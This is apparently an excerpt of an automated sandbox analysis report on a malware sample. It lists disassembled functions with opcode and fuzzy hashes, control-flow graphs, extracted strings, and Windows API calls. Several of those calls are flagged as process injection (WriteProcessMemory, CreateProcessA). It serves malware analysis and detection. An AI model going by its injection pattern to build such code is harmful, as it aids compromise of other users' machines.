                                                          • API ID:
                                                          • String ID: tIh
                                                          • API String ID: 0-443931868
                                                          • Opcode ID: 7441f2b15942e33412de7c9d8d6d2c4e6de75d77623330337476cff3d0f98608
                                                          • Instruction ID: 4b1f77b6414e943b99e5c792a8fc4e04bec56fc4c098fc81a15440c7b576f813
                                                          • Opcode Fuzzy Hash: 7441f2b15942e33412de7c9d8d6d2c4e6de75d77623330337476cff3d0f98608
                                                          • Instruction Fuzzy Hash: 1AD14B74D1420ADFCB05DFA9C4848AEFBB6FF89300F20D555D516AB614D734AA82CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00345200 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: l4
                                                          • API String ID: 0-2837824225
                                                          • Opcode ID: 66d9e26701c3b6e0e9a12211eef17dcc7e21a6a697f9560848f949f61ce89591
                                                          • Instruction ID: bc78cc057c9aeefe992dcfd34e6af52f26f294335325088682dcf5ea4ab6cea1
                                                          • Opcode Fuzzy Hash: 66d9e26701c3b6e0e9a12211eef17dcc7e21a6a697f9560848f949f61ce89591
                                                          • Instruction Fuzzy Hash: 5761F634509340AFEB469F38DD57BD67BE5BF43304F16A09AD8009F693CA20E952EB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00344559 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: l4
                                                          • API String ID: 0-2837824225
                                                          • Opcode ID: a91a0b8940bbd892df6245629d645bc9fddfcaff8609ac2c0b23caf31bdd2e89
                                                          • Instruction ID: 6b12d95bb60ec523644e4b4ff7d0c92f34476144b4678eeead0028c945715d14
                                                          • Opcode Fuzzy Hash: a91a0b8940bbd892df6245629d645bc9fddfcaff8609ac2c0b23caf31bdd2e89
                                                          • Instruction Fuzzy Hash: B05126314097906FEF579F3889537EB3BE5AF43304B45A4E9D4018F253CA20AA87E796
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0034DD2C Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 224f6d79db6a55fdc4d30f946edf3ab8a8e0ee00e867cb9779d5081a6c6656dd
                                                          • Instruction ID: efdfa63856e6685b0abc509aa4f7c7df0be9130b92e143ba0a47143971ff9860
                                                          • Opcode Fuzzy Hash: 224f6d79db6a55fdc4d30f946edf3ab8a8e0ee00e867cb9779d5081a6c6656dd
                                                          • Instruction Fuzzy Hash: AD117CB1E016598BEB18CF9BD9501DEFBF3BFC8310F14C076D509AA228DB7459568B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0034851F Relevance: 16.7, Strings: 13, Instructions: 474COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 34851f-34856b 163 348570 call 348ca5 0->163 164 348570 call 348ca8 0->164 1 348576 165 348576 call 348d80 1->165 166 348576 call 348d88 1->166 2 34857c-3485e6 call 340da4 call 3481ac call 340d94 14 3485eb-3485ee 2->14 15 3485f7-348601 14->15 16 3485f0 14->16 32 348607-348613 15->32 33 3487af 15->33 16->15 17 348674-34867e 16->17 18 348615-34865d 16->18 19 348710-348716 16->19 20 348691-3486cd 16->20 21 3486d2-3486dc 16->21 22 3486f3-3486fd 16->22 23 348898-34889c 16->23 24 34879a-3487ad 16->24 25 3487c5-3487c9 16->25 26 348821-348826 16->26 27 348861-348865 16->27 28 34880c-348819 16->28 29 3488cf 16->29 30 348828 16->30 31 3488e9-3488ed 16->31 46 348680 17->46 47 34868a-34868f 17->47 18->33 115 348663-34866f 18->115 41 34871c-348728 19->41 42 348718-34871a 19->42 20->14 21->33 36 3486e2-3486ee 21->36 37 3486ff 22->37 38 348709-34870e 22->38 39 34889e-3488a7 23->39 40 3488bf 23->40 48 3487b4 24->48 34 3487ea 25->34 35 3487cb-3487d4 25->35 43 3487b9-3487bc 26->43 49 348886 27->49 50 348867-348870 27->50 28->26 29->31 64 34882b-348850 30->64 44 348910 31->44 45 3488ef-3488f8 31->45 32->14 33->48 56 3487ed-3487ef 34->56 54 3487d6-3487d9 35->54 55 3487db-3487de 35->55 36->14 57 348704 37->57 38->57 58 3488ae-3488bb 39->58 59 3488a9-3488ac 39->59 61 3488c2-3488cd 40->61 60 34872a-348787 41->60 42->60 43->25 52 3487be 43->52 67 348913-34891d 44->67 65 3488ff-34890c 45->65 66 3488fa-3488fd 45->66 68 348685 46->68 47->68 48->43 53 348889-34888b 49->53 69 348877-34887a 50->69 70 348872-348875 50->70 52->23 52->25 52->26 52->27 52->28 52->29 52->30 52->31 72 348ad4-348ade 52->72 73 348af5-348b93 52->73 74 3489e7-348a69 52->74 75 348a9f-348acb call 553980 52->75 76 348891-348896 53->76 77 34888d 53->77 78 3487e8 54->78 55->78 79 348805-34880a 56->79 80 3487f1-3487f8 56->80 57->14 81 3488bd 58->81 59->81 60->33 138 348789-348795 60->138 99 348855-348858 61->99 64->99 83 34890e 65->83 66->83 96 348928-34892f 67->96 68->14 71 348884 69->71 70->71 71->53 92 348ae4-348af0 72->92 93 348bf7-348c05 72->93 73->93 161 348b95-348ba1 73->161 147 348a81-348a8b 74->147 148 348a6b-348a71 74->148 132 348ad1 75->132 85 34888f 76->85 77->85 78->56 88 348803 79->88 80->64 86 3487fa-3487fe 80->86 81->61 83->67 85->99 86->88 88->43 97 348931-34893a 96->97 98 348952 96->98 104 348941-34894e 97->104 105 34893c-34893f 97->105 107 348955-3489c2 98->107 99->27 111 34885a 99->111 113 348950 104->113 105->113 155 3489c4-3489ca 107->155 156 3489da-3489e2 107->156 111->23 111->27 111->29 111->31 111->72 111->73 111->74 111->75 116 348ba6-348bcf call 554640 111->116 117 348bed-348bf4 111->117 113->107 115->14 146 348bd6-348bdd 116->146 132->72 138->14 146->93 150 348bdf-348be8 146->150 147->93 154 348a91-348a9a 147->154 152 348a75-348a77 148->152 153 348a73 148->153 152->147 153->147 157 3489cc 155->157 158 3489ce-3489d0 155->158 157->156 158->156 163->1 164->1 165->2 166->2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Tep$Tep$Tep$Tep$Tep$Tep$Tep$$p$$p$$p$$p$h8$h8
                                                          • API String ID: 0-2147537707
                                                          • Opcode ID: 962ebea0421fb8ad72e27a87463ff203d385ff769d32e0fd0e84c176b0b879dc
                                                          • Instruction ID: 925fa94c59fe758ff98d7eb698a91b8c971aa796dc97d377a0a4da9933ab9633
                                                          • Opcode Fuzzy Hash: 962ebea0421fb8ad72e27a87463ff203d385ff769d32e0fd0e84c176b0b879dc
                                                          • Instruction Fuzzy Hash: 25028F30B00204DFDB1A9BA8C865BBE7AF6AF88301F658465E906EF795CF749C41CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00349DC5 Relevance: 15.2, Strings: 12, Instructions: 240COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 168 349dc5-349e0d 173 349e15-349e1d 168->173 174 349e22-349e35 173->174 175 349d68-349d6b 173->175 193 349e37-349e40 174->193 194 349e58 174->194 176 349d7d-349d81 175->176 177 349d6d 175->177 189 349da4 176->189 190 349d83-349d8c 176->190 177->174 177->176 179 349fa6-349faa 177->179 180 349ec0-349ed3 177->180 181 349f90-349f97 177->181 182 349ee0-349ef3 177->182 183 34a022-34a04c 177->183 184 34a05c-34a060 177->184 185 349e8c-349ebb 177->185 186 349f5d-349f65 177->186 187 34a08e-34a097 177->187 188 349f6a-349f7d 177->188 197 349fac-349fb5 179->197 198 349fcd 179->198 196 34a09a-34a0a6 180->196 228 349ed9-349edd 180->228 195 349f9d-349fa1 181->195 181->196 230 349ef5-349f07 182->230 231 349f09 182->231 253 34a055-34a05a 183->253 254 34a04e 183->254 191 34a081 184->191 192 34a062-34a06b 184->192 185->175 186->175 222 349f7f 188->222 223 349f89-349f8e 188->223 199 349da7-349da9 189->199 200 349d93-349da0 190->200 201 349d8e-349d91 190->201 215 34a084-34a08b 191->215 202 34a072-34a075 192->202 203 34a06d-34a070 192->203 205 349e47-349e54 193->205 206 349e42-349e45 193->206 207 349e5b-349e87 194->207 195->175 208 349fb7-349fba 197->208 209 349fbc-349fc9 197->209 211 349fd0-349fd7 198->211 217 349dc1-349dc3 199->217 218 349dab-349db1 199->218 216 349da2 200->216 201->216 221 34a07f 202->221 203->221 224 349e56 205->224 206->224 207->175 225 349fcb 208->225 209->225 226 349fed 211->226 227 349fd9-349feb 211->227 216->199 217->174 219 349db5-349dbf 218->219 220 349db3 218->220 219->217 220->217 221->215 233 349f84 222->233 223->181 223->233 224->207 225->211 238 349ff0-349ffd 226->238 227->238 228->182 236 349f0c-349f10 230->236 231->236 233->175 242 349f31 236->242 243 349f12-349f1b 236->243 251 34a015-34a01d 238->251 252 349fff-34a005 238->252 245 349f34-349f49 242->245 247 349f22-349f25 243->247 248 349f1d-349f20 243->248 245->196 259 349f4f-349f58 245->259 250 349f2f 247->250 248->250 250->245 251->175 256 34a007 252->256 257 34a009-34a00b 252->257 253->184 258 34a050 253->258 254->258 256->251 257->251 258->175 259->175
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$Tep$XXp$XXp$$p$$p$$p$$p$$p$$p
                                                          • API String ID: 0-4160604773
                                                          • Opcode ID: 2ff6827430926778272e07ab0be7910ab68bd61b6af7d0e12130b5b113e4e1e2
                                                          • Instruction ID: eb2d37eaafba013bfb11623c2d199afa51f55428954306e28d6ed80d10d039fb
                                                          • Opcode Fuzzy Hash: 2ff6827430926778272e07ab0be7910ab68bd61b6af7d0e12130b5b113e4e1e2
                                                          • Instruction Fuzzy Hash: 19914E30E04248CFDB1ADBA8D445BAEBBF6BB85301F658566E412AF794CB70AC41CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00349D7C Relevance: 11.5, Strings: 9, Instructions: 201COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 260 349d7c 261 349d7d-349d81 260->261 262 349da4 261->262 263 349d83-349d8c 261->263 264 349da7-349da9 262->264 265 349d93-349da0 263->265 266 349d8e-349d91 263->266 268 349dc1-349dc3 264->268 269 349dab-349db1 264->269 267 349da2 265->267 266->267 267->264 272 349e22-349e35 268->272 270 349db5-349dbf 269->270 271 349db3 269->271 270->268 271->268 276 349e37-349e40 272->276 277 349e58 272->277 278 349e47-349e54 276->278 279 349e42-349e45 276->279 280 349e5b-349e87 277->280 281 349e56 278->281 279->281 285 349d68-349d6b 280->285 281->280 285->261 286 349d6d 285->286 286->261 286->272 287 349fa6-349faa 286->287 288 349ec0-349ed3 286->288 289 349f90-349f97 286->289 290 349ee0-349ef3 286->290 291 34a022-34a04c 286->291 292 34a05c-34a060 286->292 293 349e8c-349ebb 286->293 294 349f5d-349f65 286->294 295 34a08e-34a097 286->295 296 349f6a-349f7d 286->296 301 349fac-349fb5 287->301 302 349fcd 287->302 300 34a09a-34a0a6 288->300 315 349ed9-349edd 288->315 299 349f9d-349fa1 289->299 289->300 318 349ef5-349f07 290->318 319 349f09 290->319 340 34a055-34a05a 291->340 341 34a04e 291->341 297 34a081 292->297 298 34a062-34a06b 292->298 293->285 294->285 316 349f7f 296->316 317 349f89-349f8e 296->317 310 34a084-34a08b 297->310 303 34a072-34a075 298->303 304 34a06d-34a070 298->304 299->285 311 349fb7-349fba 301->311 312 349fbc-349fc9 301->312 305 349fd0-349fd7 302->305 314 34a07f 303->314 304->314 322 349fed 305->322 323 349fd9-349feb 305->323 321 349fcb 311->321 312->321 314->310 315->290 324 349f84 316->324 317->289 317->324 325 349f0c-349f10 318->325 319->325 321->305 326 349ff0-349ffd 322->326 323->326 324->285 330 349f31 325->330 331 349f12-349f1b 325->331 337 34a015-34a01d 326->337 338 349fff-34a005 326->338 332 349f34-349f49 330->332 334 349f22-349f25 331->334 335 349f1d-349f20 331->335 332->300 346 349f4f-349f58 332->346 339 349f2f 334->339 335->339 337->285 343 34a007 338->343 344 34a009-34a00b 338->344 339->332 340->292 345 34a050 340->345 341->345 343->337 344->337 345->285 346->285
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-3426324077
                                                          • Opcode ID: cb74dbe22ce14c536f789cb59dd8acffd776688c98f8483a61c2b92e3c8a9a4b
                                                          • Instruction ID: a66dd15eca68d6f63ab99c22fe1146fef4616f6cc2fefa13b97b6449bcc9b39c
                                                          • Opcode Fuzzy Hash: cb74dbe22ce14c536f789cb59dd8acffd776688c98f8483a61c2b92e3c8a9a4b
                                                          • Instruction Fuzzy Hash: 2B718E30E04248CFDB1ADB98D445BAEBBF6BF85301F698567E412AF295CB70AC41DB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00341903 Relevance: 10.2, Strings: 8, Instructions: 204COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 347 341903 348 341908-34190b 347->348 349 34191d-341949 348->349 350 34190d 348->350 390 341961-341986 349->390 391 34194b-341953 349->391 350->349 351 341a24-341a26 350->351 352 341c45-341c81 350->352 353 341b06-341b20 350->353 354 341b47-341b9e 350->354 355 341ae2-341b01 350->355 356 341bc3-341c0f 350->356 357 341b2c-341b42 350->357 358 341c2e-341c42 350->358 359 341a7a-341abe 350->359 360 341a2b-341a75 350->360 361 34199b-341a1c 350->361 351->348 353->348 413 341bb6-341bbe 354->413 414 341ba0-341ba8 354->414 355->348 356->348 357->348 409 341ac0-341ac8 359->409 410 341acc-341add 359->410 361->351 406 34198e-341996 390->406 391->390 406->348 409->410 414->413
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-3004817860
                                                          • Opcode ID: b94676ff30fcd7cce6241a9a55461eede1e047575f2087e436f92332d2248581
                                                          • Instruction ID: 8ff59c2cadfbf968a88314aeac914dd2fa8604bb210659f6373fc02d4ebf4e48
                                                          • Opcode Fuzzy Hash: b94676ff30fcd7cce6241a9a55461eede1e047575f2087e436f92332d2248581
                                                          • Instruction Fuzzy Hash: FC817D30E04A48CFDB16CB94D445BACBBF5FB81301F6A8066E416AF695D770ACC1DB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00348832 Relevance: 4.0, Strings: 3, Instructions: 232COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 432 348832-348839 433 348830 432->433 434 34883b-348850 432->434 433->434 436 348855-348858 434->436 437 348861-348865 436->437 438 34885a 436->438 448 348886 437->448 449 348867-348870 437->449 438->437 439 348ad4-348ade 438->439 440 348af5-348b93 438->440 441 348ba6-348bcf call 554640 438->441 442 3489e7-348a69 438->442 443 348bed-348bf4 438->443 444 3488cf 438->444 445 348a9f-348acb call 553980 438->445 446 348898-34889c 438->446 447 3488e9-3488ed 438->447 453 348ae4-348af0 439->453 454 348bf7-348c05 439->454 440->454 525 348b95-348ba1 440->525 503 348bd6-348bdd 441->503 511 348a81-348a8b 442->511 512 348a6b-348a71 442->512 444->447 498 348ad1 445->498 455 34889e-3488a7 446->455 456 3488bf 446->456 451 348910 447->451 452 3488ef-3488f8 447->452 450 348889-34888b 448->450 457 348877-34887a 449->457 458 348872-348875 449->458 460 348891-348896 450->460 461 34888d 450->461 471 348913-34891d 451->471 467 3488ff-34890c 452->467 468 3488fa-3488fd 452->468 462 3488ae-3488bb 455->462 463 3488a9-3488ac 455->463 464 3488c2-3488cd 456->464 459 348884 457->459 458->459 459->450 472 34888f 460->472 461->472 473 3488bd 462->473 463->473 464->436 474 34890e 467->474 468->474 483 348928-34892f 471->483 472->436 473->464 474->471 484 348931-34893a 483->484 485 348952 483->485 486 348941-34894e 484->486 487 34893c-34893f 484->487 488 348955-3489c2 485->488 493 348950 486->493 487->493 520 3489c4-3489ca 488->520 521 3489da-3489e2 488->521 493->488 498->439 503->454 504 348bdf-348be8 503->504 511->454 516 348a91-348a9a 511->516 514 348a75-348a77 512->514 515 348a73 512->515 514->511 515->511 523 3489cc 520->523 524 3489ce-3489d0 520->524 523->521 524->521
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $p$$p$h8
                                                          • API String ID: 0-3008218487
                                                          • Opcode ID: 85e6671f6ce3f65aa0960f6071cf512aba2ab3bdd7f07b0c6bf5fb559cd37f91
                                                          • Instruction ID: fcd07abc8680737e28f7c1f96e9fb5807cf40fc941ff0734cde7ae1f7555eaab
                                                          • Opcode Fuzzy Hash: 85e6671f6ce3f65aa0960f6071cf512aba2ab3bdd7f07b0c6bf5fb559cd37f91
                                                          • Instruction Fuzzy Hash: 45819E30B00204DFDB1A9B68D815BBE7AF6AF84301F6584A5E806EF795CF74AC41CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 003488D2 Relevance: 4.0, Strings: 3, Instructions: 200COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 564 3488d2-3488d7 565 3488e9-3488ed 564->565 566 3488d9 564->566 567 348910 565->567 568 3488ef-3488f8 565->568 566->565 569 348ad4-348ade 566->569 570 348af5-348b93 566->570 571 348ba6-348bcf call 554640 566->571 572 3489e7-348a69 566->572 573 348bed-348bf4 566->573 574 348a9f-348acb call 553980 566->574 579 348913-34891d 567->579 575 3488ff-34890c 568->575 576 3488fa-3488fd 568->576 577 348ae4-348af0 569->577 578 348bf7-348c05 569->578 570->578 633 348b95-348ba1 570->633 611 348bd6-348bdd 571->611 620 348a81-348a8b 572->620 621 348a6b-348a71 572->621 606 348ad1 574->606 582 34890e 575->582 576->582 587 348928-34892f 579->587 582->579 588 348931-34893a 587->588 589 348952 587->589 594 348941-34894e 588->594 595 34893c-34893f 588->595 596 348955-3489c2 589->596 597 348950 594->597 595->597 627 3489c4-3489ca 596->627 628 3489da-3489e2 596->628 597->596 606->569 611->578 612 348bdf-348be8 611->612 620->578 625 348a91-348a9a 620->625 623 348a75-348a77 621->623 624 348a73 621->624 623->620 624->620 630 3489cc 627->630 631 3489ce-3489d0 627->631 630->628 631->628
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $p$$p$h8
                                                          • API String ID: 0-3008218487
                                                          • Opcode ID: a3041e5c98e387dcc58fe5f332a58c141fd5d92fa41f24102f97e5f9743f54fe
                                                          • Instruction ID: 286cc0db850af069d1b6436eb5fc453b086a410bfaa1577cbfddaac302be093d
                                                          • Opcode Fuzzy Hash: a3041e5c98e387dcc58fe5f332a58c141fd5d92fa41f24102f97e5f9743f54fe
                                                          • Instruction Fuzzy Hash: 2E719030B003049FDB169B68D815BBE7AE6AF88705F2580A5E906EF395CF749C41CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0034B4F8 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 815 34b4f8-34b514 816 34b54a-34b54f 815->816 817 34b516-34b519 816->817 818 34b522-34b536 817->818 819 34b51b 817->819 827 34b666-34b66e 818->827 834 34b53c-34b548 818->834 819->816 819->818 820 34b650-34b659 819->820 821 34b581-34b586 819->821 822 34b551-34b560 819->822 823 34b65c-34b661 819->823 824 34b59c-34b5a9 819->824 825 34b63c-34b640 819->825 826 34b588-34b597 819->826 821->817 830 34b562 822->830 831 34b569-34b56d 822->831 823->817 824->827 828 34b5af-34b5c2 824->828 825->827 832 34b642-34b64b 825->832 826->817 828->827 833 34b5c8-34b5e3 828->833 835 34b567 830->835 831->827 836 34b573-34b57f 831->836 832->817 833->827 839 34b5e9-34b600 833->839 834->817 835->817 836->835 840 34b607-34b609 839->840 841 34b602-34b606 839->841 842 34b625-34b62c 840->842 843 34b60b-34b612 840->843 841->840 842->827 845 34b62e-34b63a 842->845 843->827 844 34b614-34b61b 843->844 846 34b620 844->846 845->846 846->817
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$Pc8
                                                          • API String ID: 0-1111349688
                                                          • Opcode ID: cf76848b337f544f54ac3465bbe0fe0442b8de0f4409801859c57d36dc49a7a1
                                                          • Instruction ID: dea90bcdaf8ed18d65042a575bcd61ef81ab6e9720f0e59d1ea52af947c32329
                                                          • Opcode Fuzzy Hash: cf76848b337f544f54ac3465bbe0fe0442b8de0f4409801859c57d36dc49a7a1
                                                          • Instruction Fuzzy Hash: 7F41DF31A04610CBD7529B69D9846BAF7F4EB42701F06C5ABE466CF5A1E338E980D611
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00340848 Relevance: 2.5, Strings: 2, Instructions: 40COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 879 340848-3408d0 888 3408d6-3408d9 879->888
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: hF/$tG/
                                                          • API String ID: 0-3622080550
                                                          • Opcode ID: 5fd63b44504a261674fd32353823cbac0dd3c7becb3c74e9457c415729ec58f4
                                                          • Instruction ID: c4f91de288eddc31934f24dba110fe9a1348c0cd2379e706e503720438e46f64
                                                          • Opcode Fuzzy Hash: 5fd63b44504a261674fd32353823cbac0dd3c7becb3c74e9457c415729ec58f4
                                                          • Instruction Fuzzy Hash: DE01ED71D1020D9FCB41EFA8D9516AEFBB1EF48300F1089A5C515A7354EB745A549F81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0055CD38 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0055CFFF
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: df47ed4d2b392b3ced93b0225fd19157171eedf4f02c655f615b5fdc331e64d1
                                                          • Instruction ID: 70deeb4c4a9f17c664c282acba1da2ad75b802ce00c61b65a3648d2c57a44252
                                                          • Opcode Fuzzy Hash: df47ed4d2b392b3ced93b0225fd19157171eedf4f02c655f615b5fdc331e64d1
                                                          • Instruction Fuzzy Hash: EFC12571D002198FDF25CFA8C855BEEBBB1BF09305F0091AAD819B7250DB749A89CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0055C998 Relevance: 1.6, APIs: 1, Instructions: 122injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0055CA73
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 84ef86a685cfe5ee8d86edaf81f2883e328ec5a9a91c30e1694fd34a64edce71
                                                          • Instruction ID: fc36e87a1525f02c0f4672b6dc1cea52aa3bea81fb708e8cdd69140011659299
                                                          • Opcode Fuzzy Hash: 84ef86a685cfe5ee8d86edaf81f2883e328ec5a9a91c30e1694fd34a64edce71
                                                          • Instruction Fuzzy Hash: EB41BBB4D002589FCF10CFA9D984AEEBFF1BB49310F24902AE814B7210D334AA45CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0055C9A0 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0055CA73
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 96247e747c380a217118cd0487d66de2d8eebdaead4bdddf4d8d5db45c3e6f06
                                                          • Instruction ID: 6f6b9433282800582247f973517de7635826063d4bdae5e91401bd37e5b35c80
                                                          • Opcode Fuzzy Hash: 96247e747c380a217118cd0487d66de2d8eebdaead4bdddf4d8d5db45c3e6f06
                                                          • Instruction Fuzzy Hash: F841A9B4D002589FCF10CFA9D984AEEFFF1BB49314F20942AE814B7210D334AA45CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0055CAFA Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0055CBB2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 3878a7dff41533e36db5d076ed3778e0169f2e54c4608200ff8cf0275e3905de
                                                          • Instruction ID: d868ea7c02deb20d6b1243b509f05084f0e981b6626a5f531eb8c7ff1b97b57b
                                                          • Opcode Fuzzy Hash: 3878a7dff41533e36db5d076ed3778e0169f2e54c4608200ff8cf0275e3905de
                                                          • Instruction Fuzzy Hash: F941A8B8D002589FCF10CFA9D984AEEFFB1BB49310F20942AE814B7210D334A945CF64
